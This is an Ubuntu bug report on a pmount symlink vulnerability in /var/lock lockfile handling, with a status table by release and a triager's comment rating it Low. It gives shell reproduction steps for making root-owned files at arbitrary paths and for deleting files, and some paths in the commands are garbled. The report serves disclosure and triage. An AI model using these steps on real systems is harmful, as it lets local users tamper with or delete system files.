Symlink attacks possible with pmount
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
pmount (Ubuntu) |
Won't Fix
|
Undecided
|
Unassigned | ||
Dapper |
Won't Fix
|
Undecided
|
Unassigned | ||
Hardy |
Fix Released
|
Undecided
|
Unassigned | ||
Jaunty |
Fix Released
|
Undecided
|
Unassigned | ||
Karmic |
Fix Released
|
Undecided
|
Unassigned | ||
Lucid |
Fix Released
|
Undecided
|
Unassigned | ||
Maverick |
Won't Fix
|
Undecided
|
Unassigned |
Bug Description
Binary package hint: pmount
pmount makes use of /var/lock, which is world-writable with a sticky bit, for the creation of lockfiles. For example, when I execute:
$ pmount --lock /dev/sr0 1
pmount creates a new directory at /var/lock/
If an unprivileged user creates this directory ahead of time, pmount won't complain (it may exist due to other previous lockfiles). If that user places a symbolic link with a numeric name in the directory pointing to an arbitrary location, then pmount can be invoked to create an empty root-owned file at that location, with 0644 permissions. You can reproduce as follows, assuming a pmount-able device at /dev/sr0:
$ mkdir /var/lock/
$ ln -s /etc/suid-debug /var/lock/
$ pmount --lock /dev/sr0 1
$ stat /etc/suid-debug
Alternately, this issue can be abused to delete any file on disk that has a numeric name from 1-65536. Simply create the empty directory, call pmount --lock with the desired file to delete, remove the directory with the new lockfile inside, replace the directory with a symlink to the parent directory of the file to be deleted, and call pmount --unlock.
Dan, I can confirm this, but I don't see that pmount is altering the contents of the file if it already exists. Eg:
$ cat /etc/foo
test
$ stat /etc/foo
File: `/etc/foo'
Size: 5 Blocks: 8 IO Block: 4096 regular file
Device: fb01h/64257d Inode: 135724 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2010-06-05 12:07:30.580581903 +0000
Modify: 2010-06-05 12:05:57.868006989 +0000
Change: 2010-06-05 12:05:57.868006989 +0000
$ mkdir /var/lock/ pmount_ dev_sr0 pmount_ dev_sr0/ pmount_ dev_sr0/
$ ls -ld /var/lock/
drwxr-xr-x 2 jamie jamie 40 2010-06-05 12:12 /var/lock/
$ ln -s /etc/foo /var/lock/ pmount_ dev_sr0/ 1 pmount_ dev_sr0/ 1 pmount_ dev_sr0/ 1 -> /etc/foo
$ ls -l /var/lock/
lrwxrwxrwx 1 jamie jamie 8 2010-06-05 12:13 /var/lock/
$ pmount --lock /dev/sr0 1
$ cat /etc/foo
test
$ stat /etc/foo
File: `/etc/foo'
Size: 5 Blocks: 8 IO Block: 4096 regular file
Device: fb01h/64257d Inode: 135724 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2010-06-05 12:07:30.580581903 +0000
Modify: 2010-06-05 12:05:57.868006989 +0000
Change: 2010-06-05 12:05:57.868006989 +0000
I think I would characterize this as a 'Low' issue. A local attacker in the 'plugdev' group on Ubuntu could create things like /forcefsck or maybe fiddle with files in /var to DoS applications (eg, sockets, named pipes, etc).